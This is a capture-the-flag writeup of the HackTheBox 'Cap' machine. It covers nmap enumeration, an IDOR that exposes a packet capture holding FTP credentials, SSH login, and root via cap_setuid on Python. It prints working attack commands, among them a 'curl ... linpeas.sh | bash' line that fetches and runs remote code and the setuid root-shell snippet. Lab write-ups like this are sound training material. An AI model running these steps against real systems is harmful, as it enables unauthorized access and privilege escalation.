Home » Posts » Cap Writeup

Cap Writeup

0x5t
0x5t avatar
Security Researcher
Team: RaptX
Posts: --
Joined: 2024
Posted:  |  Tags: HackTheBox, Linux, FTP, IDOR, SSH

Synopsis

Cap is an easy Linux machine that runs an HTTP server used for administrative functions, including network traffic captures. An insecure direct object reference vulnerability allows access to another user's capture, which contains plaintext FTP credentials for the user "nathan." These credentials can be used to gain an SSH shell. Privilege escalation is achieved by exploiting a Linux capability on the Python binary.

Quick Metadata

Item Value
Machine Cap
Difficulty Easy
IP 10.10.10.10
OS Linux
Primary Vulns Insecure Direct Object Reference, Linux Capabilities

Exploitation Chain (High-Level)

  1. Network and web enumeration to discover an administrative dashboard.
  2. Exploit an Insecure Direct Object Reference (IDOR) to download another user's packet capture.
  3. Analyze the packet capture to find plaintext FTP credentials.
  4. Use the discovered credentials to log in via SSH for a user shell.
  5. Exploit a Linux capability on the Python binary to escalate privileges to root.

Pre-Reqs

  • Tooling: nmap, ftp, wireshark, python3
  • Skills: web enumeration, packet analysis, Linux capabilities

Skills Required

  • Web enumeration
  • Packet capture analysis

Skills Learned

  • Insecure Direct Object Reference (IDOR)
  • Exploiting Linux capabilities

Enumeration

Network Scan

Nmap reveals three open ports: FTP on 21, SSH on 22, and an HTTP server running Gunicorn on port 80.

PORT STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.3
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2
80/tcp  open  http    gunicorn

Nmap Commands

nmap -p- --min-rate 1000 -Pn -T4 10.10.10.10
nmap -p21,22,80 -Pn -sC -sV 10.10.10.10

Web Enumeration

The HTTP service on port 80 hosts an administrative dashboard. Exploring the pages reveals functionality to view IP configuration and network status, which suggests the application is executing system commands on the backend. A "Security Snapshot" feature captures network traffic, which can then be downloaded.

Service-Specific Enumeration

Attempts to log into FTP with anonymous access fail, so further enumeration of the FTP service is stopped.

Credentials / Artifacts Discovered

Stage Credential / Token Usage
Foothold nathan:Buck3tH4TF0RM3! SSH login

Foothold

The web application's packet capture feature, accessible at /data/<id>, is vulnerable to an Insecure Direct Object Reference (IDOR). While new captures generate new IDs, changing the ID in the URL to /data/0 grants access to an older packet capture. Downloading and analyzing this capture file with Wireshark reveals unencrypted FTP traffic.

Initial Vulnerability (IDOR)

## Accessing an old packet capture via IDOR
curl http://10.10.10.10/data/0 -o capture.pcap

Analysis of the capture.pcap file shows the credentials for the user "nathan" being used for an FTP login.

Time Source Destination Protocol Info
4.126500 10.10.10.10 10.10.10.10 FTP Request: USER nathan
5.424998 10.10.10.10 10.10.10.10 FTP Request: PASS Buck3tH4TF0RM3!

These credentials nathan:Buck3tH4TF0RM3! are successfully used to gain an SSH shell.

SSH Login

ssh [email protected]

Result: shell as nathan.

Shell Stabilization

python3 -c 'import pty,os; pty.spawn("/bin/bash")'
export TERM=xterm

Privilege Escalation

Vector 1: Linux Capabilities

Running linpeas.sh reveals that /usr/bin/python3.8 has the cap_setuid and cap_net_bind_service capabilities.

Evidence:

curl http://11.11.11.11/linpeas.sh | bash

<SNIP>

Files with capabilities:

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep

The cap_setuid capability allows a process to change its UID to 0 (root) without the SUID bit being set. A simple Python script can be used to leverage this capability to gain a root shell.

Exploit:

/usr/bin/python3.8

import os
os.setuid(0)
os.system("/bin/bash")

After running the Python code, the id command confirms root privileges.

root@cap:/tmp# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)

Result: Obtained root privileges.

Root Flag

cat /root/root.txt

Hash / Flag: {REDACTED}

Summary

  1. Network enumeration revealed a web server on port 80 with an administrative dashboard.
  2. An IDOR vulnerability was discovered in the packet capture feature, allowing the download of an old packet capture.
  3. The old capture file contained plaintext credentials for the user nathan, which were used to log in via SSH.
  4. Privilege escalation was achieved by exploiting the cap_setuid Linux capability on the /usr/bin/python3.8 binary to gain a root shell.

Lessons Learned

  • The importance of securing direct object references to prevent unauthorized access to sensitive data.
  • Packet captures can contain valuable, unencrypted information like credentials.
  • The functionality and exploitation of Linux capabilities, specifically cap_setuid, which can be a powerful privilege escalation vector if misconfigured.
Back to Posts
Contents